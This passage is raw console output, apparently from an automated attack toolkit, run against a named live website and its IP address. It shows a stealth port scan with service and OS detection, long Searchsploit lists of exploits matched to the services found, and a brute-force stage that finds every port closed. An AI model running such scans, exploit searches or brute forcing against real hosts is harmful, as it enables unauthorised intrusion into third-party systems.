3374. W, [2017-10-27T04:59:23.819890 #8161] WARN -- : Yasuo did not find any potential hosts to enumerate
3375.  + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
3376.  
3377. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 04:59 EDT
3378. NSE: Loaded 42 scripts for scanning.
3379. Initiating Parallel DNS resolution of 1 host. at 04:59
3380. Completed Parallel DNS resolution of 1 host. at 04:59, 0.06s elapsed
3381. Initiating SYN Stealth Scan at 04:59
3382. Scanning candydollchan.net (91.219.29.120) [65355 ports]
3383. Discovered open port 22/tcp on 91.219.29.120
3384. Discovered open port 80/tcp on 91.219.29.120
3385. Increasing send delay for 91.219.29.120 from 0 to 5 due to 11 out of 23 dropped probes since last increase.
3386. Increasing send delay for 91.219.29.120 from 5 to 10 due to 59 out of 146 dropped probes since last increase.
3387. SYN Stealth Scan Timing: About 3.73% done; ETC: 05:13 (0:13:20 remaining)
3388. SYN Stealth Scan Timing: About 4.62% done; ETC: 05:21 (0:21:00 remaining)
3389. Warning: 91.219.29.120 giving up on port because retransmission cap hit (6).
3390. SYN Stealth Scan Timing: About 5.55% done; ETC: 05:26 (0:25:49 remaining)
3391. SYN Stealth Scan Timing: About 6.43% done; ETC: 05:30 (0:29:22 remaining)
3392. SYN Stealth Scan Timing: About 7.26% done; ETC: 05:34 (0:32:09 remaining)
3393. SYN Stealth Scan Timing: About 8.09% done; ETC: 05:36 (0:34:16 remaining)
3394. SYN Stealth Scan Timing: About 8.78% done; ETC: 05:39 (0:36:32 remaining)
3395. SYN Stealth Scan Timing: About 9.54% done; ETC: 05:42 (0:38:33 remaining)
3396. SYN Stealth Scan Timing: About 16.67% done; ETC: 05:43 (0:36:20 remaining)
3397. SYN Stealth Scan Timing: About 20.43% done; ETC: 05:42 (0:34:09 remaining)
3398. SYN Stealth Scan Timing: About 25.79% done; ETC: 05:42 (0:31:59 remaining)
3399. SYN Stealth Scan Timing: About 29.92% done; ETC: 05:41 (0:29:47 remaining)
3400. SYN Stealth Scan Timing: About 34.03% done; ETC: 05:41 (0:27:39 remaining)
3401. SYN Stealth Scan Timing: About 42.60% done; ETC: 05:43 (0:25:30 remaining)
3402. SYN Stealth Scan Timing: About 47.67% done; ETC: 05:43 (0:23:14 remaining)
3403. SYN Stealth Scan Timing: About 53.05% done; ETC: 05:44 (0:20:57 remaining)
3404. SYN Stealth Scan Timing: About 62.61% done; ETC: 05:49 (0:18:39 remaining)
3405. SYN Stealth Scan Timing: About 67.96% done; ETC: 05:49 (0:16:06 remaining)
3406. SYN Stealth Scan Timing: About 73.60% done; ETC: 05:50 (0:13:33 remaining)
3407. SYN Stealth Scan Timing: About 82.33% done; ETC: 06:01 (0:10:54 remaining)
3408. SYN Stealth Scan Timing: About 87.24% done; ETC: 06:10 (0:09:01 remaining)
3409. SYN Stealth Scan Timing: About 90.92% done; ETC: 06:17 (0:07:04 remaining)
3410. SYN Stealth Scan Timing: About 93.74% done; ETC: 06:22 (0:05:12 remaining)
3411. SYN Stealth Scan Timing: About 95.80% done; ETC: 06:26 (0:03:38 remaining)
3412. SYN Stealth Scan Timing: About 97.22% done; ETC: 06:28 (0:02:29 remaining)
3413. SYN Stealth Scan Timing: About 98.17% done; ETC: 06:30 (0:01:40 remaining)
3414. SYN Stealth Scan Timing: About 98.82% done; ETC: 06:31 (0:01:05 remaining)
3415. SYN Stealth Scan Timing: About 99.39% done; ETC: 06:31 (0:00:34 remaining)
3416. Completed SYN Stealth Scan at 06:55, 6961.34s elapsed (65355 total ports)
3417. Initiating Service scan at 06:55
3418. Scanning 2 services on candydollchan.net (91.219.29.120)
3419. Completed Service scan at 06:55, 9.91s elapsed (2 services on 1 host)
3420. Initiating OS detection (try #1) against candydollchan.net (91.219.29.120)
3421. Retrying OS detection (try #2) against candydollchan.net (91.219.29.120)
3422. NSE: Script scanning 91.219.29.120.
3423. Initiating NSE at 06:56
3424. Completed NSE at 06:56, 11.20s elapsed
3425. Initiating NSE at 06:56
3426. Completed NSE at 06:56, 0.01s elapsed
3427. Nmap scan report for candydollchan.net (91.219.29.120)
3428. Host is up (0.77s latency).
3429. rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
3430. Not shown: 65344 closed ports
3431. PORT STATE SERVICE VERSION
3432. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
3433. 25/tcp filtered smtp
3434. 80/tcp open http nginx 1.10.2
3435. 135/tcp filtered msrpc
3436. 137/tcp filtered netbios-ns
3437. 138/tcp filtered netbios-dgm
3438. 139/tcp filtered netbios-ssn
3439. 445/tcp filtered microsoft-ds
3440. 465/tcp filtered smtps
3441. 587/tcp filtered submission
3442. 5853/tcp filtered unknown
3443. Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 3.10 (92%), Linux 4.0 (91%), Linux 2.6.39 (91%), Linux 3.11 - 4.1 (91%), Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Synology DiskStation Manager 5.1 (91%), WatchGuard Fireware 11.8 (91%)
3444. No exact OS matches for host (test conditions non-ideal).
3445. Uptime guess: 13.020 days (since Sat Oct 14 06:28:09 2017)
3446. Network Distance: 12 hops
3447. TCP Sequence Prediction: Difficulty=260 (Good luck!)
3448. IP ID Sequence Generation: All zeros
3449.  
3450. Read data files from: /usr/bin/../share/nmap
3451. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3452. Nmap done: 1 IP address (1 host up) scanned in 7013.21 seconds
3453. Raw packets sent: 109802 (4.836MB) | Rcvd: 102695 (4.187MB)
3454.  + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +
3455. [i] Reading: '/usr/share/sniper/loot/nmap/nmap-candydollchan.net.xml'
3456.  
3457. --------------------------------------------- ----------------------------------
3458. Exploit Title | Path
3459. | (/usr/share/exploitdb/platforms/)
3460. --------------------------------------------- ----------------------------------
3461. Debian OpenSSH - Authenticated Remote SELinu | linux/remote/6094.txt
3462. Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIE | multiple/dos/1572.pl
3463. FreeBSD OpenSSH 3.5p1 - Remote Command Execu | freebsd/remote/17462.txt
3464. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
3465. OpenSSH 1.2 - '.scp' File Create/Overwrite | linux/remote/20253.sh
3466. OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-b | unix/remote/21314.txt
3467. OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token B | linux/remote/21402.txt
3468. OpenSSH 3.x - Challenge-Response Buffer Over | unix/remote/21578.txt
3469. OpenSSH 3.x - Challenge-Response Buffer Over | unix/remote/21579.txt
3470. OpenSSH 4.3 p1 - Duplicated Block Remote Den | multiple/dos/2444.sh
3471. OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
3472. OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
3473. OpenSSH 7.2p1 - Authenticated xauth Command | multiple/remote/39569.py
3474. OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
3475. OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
3476. OpenSSH < 7.4 - agent Protocol Arbitrary Lib | linux/remote/40963.txt
3477. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
3478. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
3479. OpenSSHd 7.2p2 - Username Enumeration (PoC) | linux/remote/40113.txt
3480. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
3481. glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - | linux/local/258.sh
3482. --------------------------------------------- ----------------------------------
3483. --------------------------------------------- ----------------------------------
3484. Exploit Title | Path
3485. | (/usr/share/exploitdb/platforms/)
3486. --------------------------------------------- ----------------------------------
3487. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
3488. OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
3489. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
3490. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
3491. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
3492. --------------------------------------------- ----------------------------------
3493. --------------------------------------------- ----------------------------------
3494. Exploit Title | Path
3495. | (/usr/share/exploitdb/platforms/)
3496. --------------------------------------------- ----------------------------------
3497. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
3498. OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
3499. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
3500. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
3501. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
3502. --------------------------------------------- ----------------------------------
3503. --------------------------------------------- ----------------------------------
3504. Exploit Title | Path
3505. | (/usr/share/exploitdb/platforms/)
3506. --------------------------------------------- ----------------------------------
3507. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
3508. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
3509. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
3510. --------------------------------------------- ----------------------------------
3511. --------------------------------------------- ----------------------------------
3512. Exploit Title | Path
3513. | (/usr/share/exploitdb/platforms/)
3514. --------------------------------------------- ----------------------------------
3515. AA SMTP Server 1.1 - Crash (PoC) | windows/dos/14990.txt
3516. Alt-N MDaemon 6.5.1 - IMAP/SMTP Remote Buffe | windows/remote/473.c
3517. Alt-N MDaemon 6.5.1 SMTP Server - Multiple C | windows/remote/24624.c
3518. Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Ar | windows/dos/23146.c
3519. Apache James 2.2 - SMTP Denial of Service | multiple/dos/27915.pl
3520. BL4 SMTP Server < 0.1.5 - Remote Buffer Over | windows/dos/1721.pl
3521. BaSoMail 1.24 - SMTP Server Command Buffer O | windows/dos/22668.txt
3522. BaSoMail Server 1.24 - POP3/SMTP Remote Deni | windows/dos/594.pl
3523. Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overf | windows/local/38472.py
3524. Cisco PIX Firewall 4.x/5.x - SMTP Content Fi | hardware/remote/20231.txt
3525. Citadel SMTP 7.10 - Remote Overflow | windows/remote/4949.txt
3526. Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay | linux/remote/20994.txt
3527. CodeBlue 5.1 - SMTP Response Buffer Overflow | windows/remote/21643.c
3528. CommuniCrypt Mail 1.16 - 'ANSMTP.dll/AOSMTP. | windows/remote/12663.html
3529. CommuniCrypt Mail 1.16 - SMTP ActiveX Stack | windows/remote/16566.rb
3530. Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer | windows/remote/19495.c
3531. DeepOfix SMTP Server 3.3 - Authentication By | linux/remote/29706.txt
3532. EType EServ 2.9x - SMTP Remote Denial of Ser | windows/dos/22123.pl
3533. EasyMail Objects 'EMSMTP.DLL 6.0.1' - Active | windows/remote/10007.html
3534. Eudora 7.1 - SMTP ResponseRemote Remote Buff | windows/remote/3934.py
3535. Exim ESMTP 4.80 - glibc gethostbyname Denial | linux/dos/35951.py
3536. FloosieTek FTGate PRO 1.22 - SMTP MAIL FROM | windows/dos/22568.pl
3537. FloosieTek FTGate PRO 1.22 - SMTP RCPT TO Bu | windows/dos/22569.pl
3538. Free SMTP Server 2.2 - Spam Filter | windows/remote/1193.pl
3539. GoodTech SMTP Server 5.14 - Denial of Servic | windows/dos/1162.pl
3540. Hastymail 1.x - IMAP SMTP Command Injection | php/webapps/28777.txt
3541. Inetserv 3.23 - SMTP Denial of Service | windows/dos/16035.py
3542. Inframail Advantage Server Edition 6.0 < 6.3 | windows/dos/1165.pl
3543. Ipswitch Imail Server 5.0 - SMTP HELO Argume | windows/dos/23145.c
3544. Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Ov | windows/dos/20221.pl
3545. LeadTools Imaging LEADSmtp - ActiveX Control | windows/remote/35880.html
3546. Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA M | multiple/dos/19368.sh
3547. Lotus Domino SMTP Router & Email Server and | multiple/dos/17549.txt
3548. MAILsweeper SMTP 4.2.1 + F-Secure Anti-Virus | windows/dos/21006.txt
3549. MDaemon SMTP Server 5.0.5 - Null Password Au | windows/remote/23002.txt
3550. MIMEsweeper For SMTP - Multiple Cross-Site S | asp/webapps/38318.txt
3551. MailEnable 1.x - SMTP HELO Command Remote De | windows/dos/28103.pl
3552. MailEnable 2.x - SMTP NTLM Authentication Mu | windows/dos/28735.pl
3553. MailEnable 3.13 SMTP Service - 'VRFY/EXPN' C | windows/dos/5235.py
3554. MailEnable Enterprise 1.x - SMTP Remote Deni | windows/dos/916.pl
3555. Mailtraq 2.1.0.1302 - Remote Format String S | windows/dos/22780.txt
3556. Majordomo2 - Directory Traversal (SMTP/HTTP) | multiple/remote/16103.txt
3557. Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer | windows/remote/16821.rb
3558. Mercury/32 Mail SMTPD - Remote Unauthenticat | windows/dos/4294.pl
3559. Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 | windows/remote/4301.cpp
3560. Mercury/32 Mail Server 3.32 < 4.51 - SMTP Un | windows/remote/4316.cpp
3561. Microsoft Exchange Server 4.0/5.0 - SMTP HEL | windows/remote/23113.c
3562. Microsoft IIS 4.0/5.0 - SMTP Service Encapsu | windows/remote/21613.txt
3563. Microsoft Windows - ANI LoadAniIcon() Chunk | windows/remote/16698.rb
3564. Mock SMTP Server 1.0 - Remote Crash (PoC) | windows/dos/37954.py
3565. NJStar Communicator 3.00 - MiniSMTP Server R | windows/remote/18057.rb
3566. NJStar Communicator MiniSmtp - Buffer Overfl | windows/dos/18196.py
3567. NetcPlus SmartServer 3.5.1 - SMTP Buffer Ove | windows/remote/19494.c
3568. Network Associates Webshield SMTP 4.5 - Inva | windows/dos/20432.txt
3569. Postcast Server Pro 3.0.61 - / Quiksoft Easy | windows/remote/4328.html
3570. Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit | linux/remote/34896.py
3571. QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overf | windows/remote/2649.c
3572. QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overf | windows/remote/3067.txt
3573. QK SMTP 3.01 - 'RCPT TO' Remote Denial of Se | windows/dos/2625.c
3574. QK SMTP Server - Malformed Commands Multiple | multiple/dos/30885.txt
3575. Qmail SMTP - Bash Environment Variable Injec | linux/remote/42938.rb
3576. Qwik SMTP 0.3 - Format String | linux/remote/620.c
3577. SPECTral Personal SMTP Server 0.4.2 - Denial | windows/dos/899.pl
3578. Sitemagic CMS - 'SMTpl' Directory Traversal | php/webapps/35877.txt
3579. SmartMax MailMax 1.0 - SMTP Buffer Overflow | windows/remote/20600.c
3580. Softek MailMarshal 4 / Trend Micro ScanMail | multiple/remote/21029.pl
3581. SoftiaCom wMailServer 1.0 - SMTP Remote Buff | windows/remote/1463.pm
3582. SquirrelMail PGP Plugin - Command Execution | linux/remote/16888.rb
3583. SysGauge 1.5.18 - SMTP Validation Buffer Ove | windows/remote/41672.rb
3584. TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' | windows/remote/598.py
3585. TABS MailCarrier 2.51 - SMTP EHLO Overflow ( | windows/remote/16822.rb
3586. YahooPOPs 1.6 - SMTP Port Buffer Overflow | windows/remote/577.c
3587. YahooPOPs 1.6 - SMTP Remote Buffer Overflow | windows/remote/582.c
3588. dSMTP Mail Server 3.1b (Linux) - Format Stri | linux/remote/981.c
3589. i.Scribe SMTP Client 2.00b - wscanf Remote F | windows/dos/7249.php
3590. iScripts AutoHoster - 'main_smtp.php' Unspec | php/webapps/38889.txt
3591. nbSMTP 0.99 - 'util.c' Client-Side Command E | linux/remote/1138.c
3592. sSMTP 2.62 - 'standardize()' Buffer Overflow | linux/dos/34375.txt
3593. --------------------------------------------- ----------------------------------
3594. --------------------------------------------- ----------------------------------
3595. Exploit Title | Path
3596. | (/usr/share/exploitdb/platforms/)
3597. --------------------------------------------- ----------------------------------
3598. Nginx (Debian-Based Distros + Gentoo) - 'log | linux/local/40768.sh
3599. Nginx 0.6.36 - Directory Traversal | multiple/remote/12804.txt
3600. Nginx 0.6.38 - Heap Corruption | linux/local/14830.py
3601. Nginx 0.6.x - Arbitrary Code Execution NullB | multiple/webapps/24967.txt
3602. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
3603. Nginx 0.7.61 - WebDAV Directory Traversal | multiple/remote/9829.txt
3604. Nginx 0.7.64 - Terminal Escape Sequence in L | multiple/remote/33490.txt
3605. Nginx 0.7.65/0.8.39 (dev) - Source Disclosur | windows/remote/13822.txt
3606. Nginx 0.8.36 - Source Disclosure / Denial of | windows/remote/13818.txt
3607. Nginx 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
3608. Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
3609. Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
3610. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
3611. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
3612. --------------------------------------------- ----------------------------------
3613. --------------------------------------------- ----------------------------------
3614. Exploit Title | Path
3615. | (/usr/share/exploitdb/platforms/)
3616. --------------------------------------------- ----------------------------------
3617. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
3618. Nginx 0.7.61 - WebDAV Directory Traversal | multiple/remote/9829.txt
3619. Nginx 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
3620. Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
3621. Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
3622. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
3623. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
3624. --------------------------------------------- ---------------------------------
3625. --------------------------------------------- ----------------------------------
3626. Exploit Title | Path
3627. | (/usr/share/exploitdb/platforms/)
3628. --------------------------------------------- ----------------------------------
3629. BEA WebLogic 7.0 - Hostname/NetBIOS Name Rem | windows/remote/22448.txt
3630. Microsoft Windows 95/98 - NetBIOS NULL Name | windows/remote/19889.c
3631. Microsoft Windows NT 4.0/2000 - NetBIOS Name | windows/remote/20106.cpp
3632. netBIOS - 'newsid' SQL Injection | php/webapps/5852.txt
3633. --------------------------------------------- ----------------------------------
3634. --------------------------------------------- ----------------------------------
3635. Exploit Title | Path
3636. | (/usr/share/exploitdb/platforms/)
3637. --------------------------------------------- ----------------------------------
3638. BEA WebLogic 7.0 - Hostname/NetBIOS Name Rem | windows/remote/22448.txt
3639. Microsoft Windows 95/98 - NetBIOS NULL Name | windows/remote/19889.c
3640. Microsoft Windows NT 4.0/2000 - NetBIOS Name | windows/remote/20106.cpp
3641. netBIOS - 'newsid' SQL Injection | php/webapps/5852.txt
3642. --------------------------------------------- ----------------------------------
3643. --------------------------------------------- ----------------------------------
3644. Exploit Title | Path
3645. | (/usr/share/exploitdb/platforms/)
3646. --------------------------------------------- ----------------------------------
3647. BEA WebLogic 7.0 - Hostname/NetBIOS Name Rem | windows/remote/22448.txt
3648. Microsoft Windows 95/98 - NetBIOS NULL Name | windows/remote/19889.c
3649. Microsoft Windows NT 4.0/2000 - NetBIOS Name | windows/remote/20106.cpp
3650. netBIOS - 'newsid' SQL Injection | php/webapps/5852.txt
3651. --------------------------------------------- ----------------------------------
3652. --------------------------------------------- ----------------------------------
3653. Exploit Title | Path
3654. | (/usr/share/exploitdb/platforms/)
3655. --------------------------------------------- ----------------------------------
3656. MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0 | windows/local/19506.txt
3657. Microsoft Color Management Module 'icm32.dll | windows/dos/41657.txt
3658. Microsoft Color Management Module 'icm32.dll | windows/dos/41659.txt
3659. Microsoft Data Access Components (MDAC) 2.1 | windows/local/19425.txt
3660. Microsoft Data Access Components (MDAC) 2.1 | windows/remote/19424.pl
3661. Microsoft Edge - 'CText­Extractor::Get­Blo | windows/dos/40797.html
3662. Microsoft Edge - Out-of-Bounds Access when F | windows/dos/42481.js
3663. Microsoft Edge 38.14393.1066.0 - 'CInputDate | windows/dos/42459.html
3664. Microsoft Edge 38.14393.1066.0 - 'COptionsCo | windows/dos/42759.html
3665. Microsoft Excel - Out-of-Bounds Read Remote | windows/local/39694.txt
3666. Microsoft GDI+ - 'gdiplus!GetRECTSForPlaybac | windows/dos/41656.txt
3667. Microsoft IIS - MDAC 'msadcs.dll' RDS DataSt | windows/remote/19026.rb
3668. Microsoft IIS 3.0 - 'newdsn.exe' File Creati | windows/remote/20309.txt
3669. Microsoft Internet Explorer - CardSpaceClaim | windows/remote/29857.rb
3670. Microsoft Internet Explorer - MSHTML!CMultiR | windows/dos/40253.html
3671. Microsoft Internet Explorer - Recordset Doub | windows/remote/3577.html
3672. Microsoft Internet Explorer 6 - ADODB.Record | windows/dos/28145.html
3673. Microsoft Internet Explorer 6 - RDS.DataCont | windows/dos/28194.txt
3674. Microsoft Internet Explorer 8 - MSHTML 'SRun | windows/dos/40841.html
3675. Microsoft Internet Explorer 9 - MSHTML CPtsT | windows/dos/40722.html
3676. Microsoft Internet Explorer 9/10/11 - CDOMSt | windows/remote/39698.html
3677. Microsoft Internet Explorer 9/10/11 - MSHTML | windows/dos/40748.html
3678. Microsoft LSASS Service - DsRolerUpgradeDown | windows/remote/16368.rb
3679. Microsoft MsMpEng - Multiple Problems Handli | windows/local/42077.txt
3680. Microsoft OWC Spreadsheet - HTMLURL Buffer O | windows/remote/16542.rb
3681. Microsoft Office / COM Object - 'WMALFXGFXDS | windows/dos/39233.txt
3682. Microsoft Office 2007 - 'OGL.dll' DpOutputSp | windows/dos/37911.txt
3683. Microsoft Office 2007 - 'OGL.dll' ValidateBi | windows/dos/38217.txt
3684. Microsoft Office PowerPoint 2010 - GDI 'GDI3 | windows/dos/41419.txt
3685. Microsoft Office PowerPoint 2010 - MSO/OART | windows/dos/41418.txt
3686. Microsoft Office Products - Array Index Boun | windows/dos/1615.txt
3687. Microsoft Office Web Components (OWC) Spread | windows/dos/9163.txt
3688. Microsoft Office Web Components (OWC) Spread | windows/remote/16537.rb
3689. Microsoft Office Web Components Spreadsheet | windows/remote/9224.py
3690. Microsoft Site Server Commerce Edition 3.0 a | windows/remote/19208.txt
3691. Microsoft Visual Basic Enterprise 6 SP6 - '. | windows/local/4938.py
3692. Microsoft Visual Studio .NET - 'msdds.dll' R | windows/remote/26167.pl
3693. Microsoft WININET.dll - CHttp­Header­Parse | windows/dos/40747.html
3694. Microsoft Windows - 'ATMFD.DLL' Out-of-Bound | windows/dos/37916.txt
3695. Microsoft Windows - 'ATMFD.DLL' Out-of-Bound | windows/dos/37917.txt
3696. Microsoft Windows - 'ATMFD.dll' CharString S | windows/dos/37923.txt
3697. Microsoft Windows - 'USP10!CreateIndexTable' | windows/dos/42237.txt
3698. Microsoft Windows - 'USP10!MergeLigRecords' | windows/dos/42234.txt
3699. Microsoft Windows - 'USP10!NextCharInLiga' U | windows/dos/42238.txt
3700. Microsoft Windows - 'USP10!SubstituteNtoM' U | windows/dos/42236.txt
3701. Microsoft Windows - 'USP10!otlReverseChainin | windows/dos/42241.txt
3702. Microsoft Windows - 'USP10!otlSinglePosLooku | windows/dos/42239.txt
3703. Microsoft Windows - 'USP10!otlValueRecord::a | windows/dos/42240.txt
3704. Microsoft Windows - 'USP10!ttoGetTableData' | windows/dos/42235.txt
3705. Microsoft Windows - 'gdi32.dll' EMR_SETDIBIT | windows/dos/41363.txt
3706. Microsoft Windows - 'gdi32.dll' Multiple DIB | windows/dos/39990.txt
3707. Microsoft Windows - 'win32k.sys' TTF Font Pr | windows/dos/37914.txt
3708. Microsoft Windows - 'win32k.sys' TTF Font Pr | windows/dos/37915.txt
3709. Microsoft Windows - 'win32k.sys' TTF Process | windows/dos/40598.txt
3710. Microsoft Windows - GDI+ DecodeCompressedRLE | windows/dos/40255.txt
3711. Microsoft Windows - GDI+ ValidateBitmapInfo | windows/dos/40256.txt
3712. Microsoft Windows - Uniscribe Font Processin | windows/dos/41646.txt
3713. Microsoft Windows - Uniscribe Font Processin | windows/dos/41648.txt
3714. Microsoft Windows - Uniscribe Font Processin | windows/dos/41650.txt
3715. Microsoft Windows - Uniscribe Font Processin | windows/dos/41652.txt
3716. Microsoft Windows - Uniscribe Font Processin | windows/dos/41655.txt
3717. Microsoft Windows - Uniscribe Heap-Based Out | windows/dos/41658.txt
3718. Microsoft Windows - Win32k!xxxRealDrawMenuIt | windows/dos/14668.txt
3719. Microsoft Windows - nt!SeObjectCreateSaclAcc | windows/dos/14670.txt
3720. Microsoft Windows 7 Kernel - Pool-Based Out- | windows/dos/42009.txt
3721. Microsoft Windows Kernel - 'ATMFD.DLL' Out-o | windows/dos/42243.txt
3722. Microsoft Windows Kernel - NtGdiGetTextExten | windows/dos/39648.txt
3723. Microsoft Windows Kernel - Registry Hive Loa | windows/dos/40766.txt
3724. Microsoft Windows Kernel - win32k.sys '.TTF' | windows/dos/42744.txt
3725. Microsoft Windows Kernel - win32k.sys .TTF F | windows/dos/42746.txt
3726. Microsoft Windows Media Services 4.0/4.1 - H | windows/dos/19759.c
3727. Microsoft Windows Server 2008/2012 - LDAP Ro | windows/dos/40703.pl
3728. Microsoft Word 2007/2010/2013/2016 - Out-of- | windows/local/40224.txt
3729. Microsoft Works 8.0 Spreadsheet - Multiple V | windows/dos/28222.txt
3730. --------------------------------------------- ----------------------------------
3731. --------------------------------------------- ----------------------------------
3732. Exploit Title | Path
3733. | (/usr/share/exploitdb/platforms/)
3734. --------------------------------------------- ----------------------------------
3735. Apple WebKit - 'FormSubmission::create' Use- | multiple/dos/41811.html
3736. Free Article Submissions 1.0 - SQL Injection | php/webapps/35492.txt
3737. NVIDIA Driver 375.70 - Buffer Overflow in Co | windows/dos/41365.txt
3738. PHP-Nuke News Submission Story - Text Field | php/webapps/27060.txt
3739. WordPress Plugin Resume Submissions & Job Po | php/webapps/19791.txt
3740. --------------------------------------------- ----------------------------------
3741.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
3742.  __________ __ ____ ___
3743.  \______ \_______ __ ___/ |_ ____ \ \/ /
3744.  | | _/\_ __ \ | \ __\/ __ \ \ / 
3745.  | | \ | | \/ | /| | \ ___/ / \ 
3746.  |______ / |__| |____/ |__| \___ >___/\ \ 
3747.  \/ \/ \_/
3748.  
3749.  + -- --=[BruteX v1.7 by 1N3
3750.  + -- --=[http://crowdshield.com
3751.  
3752.  
3753. ################################### Running Port Scan ##############################
3754.  
3755. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 06:56 EDT
3756. Nmap done: 1 IP address (1 host up) scanned in 4.20 seconds
3757.  
3758. ################################### Running Brute Force ############################
3759.  
3760.  + -- --=[Port 21 closed... skipping.
3761.  + -- --=[Port 22 closed... skipping.
3762.  + -- --=[Port 23 closed... skipping.
3763.  + -- --=[Port 25 closed... skipping.
3764.  + -- --=[Port 80 closed... skipping.
3765.  + -- --=[Port 110 closed... skipping.
3766.  + -- --=[Port 139 closed... skipping.
3767.  + -- --=[Port 162 closed... skipping.
3768.  + -- --=[Port 389 closed... skipping.
3769.  + -- --=[Port 443 closed... skipping.
3770.  + -- --=[Port 445 closed... skipping.
3771.  + -- --=[Port 512 closed... skipping.
3772.  + -- --=[Port 513 closed... skipping.
3773.  + -- --=[Port 514 closed... skipping.
3774.  + -- --=[Port 993 closed... skipping.
3775.  + -- --=[Port 1433 closed... skipping.
3776.  + -- --=[Port 1521 closed... skipping.
3777.  + -- --=[Port 3306 closed... skipping.
3778.  + -- --=[Port 3389 closed... skipping.
3779.  + -- --=[Port 5432 closed... skipping.
3780.  + -- --=[Port 5900 closed... skipping.
3781.  + -- --=[Port 5901 closed... skipping.
3782.  + -- --=[Port 8000 closed... skipping.
3783.  + -- --=[Port 8080 closed... skipping.
3784.  + -- --=[Port 8100 closed... skipping.
3785.  + -- --=[Port 6667 closed... skipping.
3786. #######################################################################################################################################